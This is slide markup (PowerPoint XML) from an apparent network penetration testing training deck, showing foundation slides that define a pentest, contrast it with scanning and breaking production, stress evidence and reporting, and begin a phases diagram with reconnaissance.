            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178040" y="5248656"/>
            <a:ext cx="4297680" cy="320040"/>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Wrap up</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178040" y="5586984"/>
            <a:ext cx="4297680" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>what the defender sees, writing it up</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="6355080"/>
            <a:ext cx="8229600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1820"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Five hands-on breaks along the way. Laptops stay open.</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B0711"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4297680" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="12082A"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2011680"/>
            <a:ext cx="3291840" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="2788920"/>
            <a:ext cx="6675120" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Foundations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983480" y="3657600"/>
            <a:ext cx="6583680" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>What a network pentest is, and the three</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>networking facts you cannot skip.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>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05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01 / FOUNDATIONS</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A network pentest in one sentence</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06</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="11091672" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6087"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="1645920"/>
            <a:ext cx="10424160" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>You are paid to find the way in before somebody else does, and then to write down exactly how you did it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="2834640"/>
            <a:ext cx="4572000" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>IT IS NOT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="3200400"/>
            <a:ext cx="5303520" cy="2377440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A vulnerability scan. A scanner produces a list. You produce proof.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A competition. Nobody gets points for style.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Breaking things. If you knock production over, you failed the engagement.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="2834640"/>
            <a:ext cx="4572000" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>IT IS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="3200400"/>
            <a:ext cx="5303520" cy="2377440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Systematic. Same method every time, so nothing is missed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Evidence driven. Screenshot, command, output, timestamp.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A report at the end. The report is the product, not the shell.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5897880"/>
            <a:ext cx="10789920" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Client memory is short. If it is not in the report with a reproduction step, it did not happen.</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01 / FOUNDATIONS</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The phases of a network pentest</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07</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1664208"/>
            <a:ext cx="1691640" cy="2331720"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3784"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713232" y="1828800"/>
            <a:ext cx="1371600" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713232" y="2286000"/>
            <a:ext cx="1417320" cy="640080"/>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Recon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713232" y="2962656"/>
            <a:ext cx="1417320" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Who is the target,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>what is public</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2258568" y="2825496"/>
            <a:ext cx="155448" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="B174FB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2432304" y="1664208"/>
            <a:ext cx="1691640" cy="2331720"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3784"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2596896" y="1828800"/>
            <a:ext cx="1371600" cy="384048"/>
          </a:xfrm>
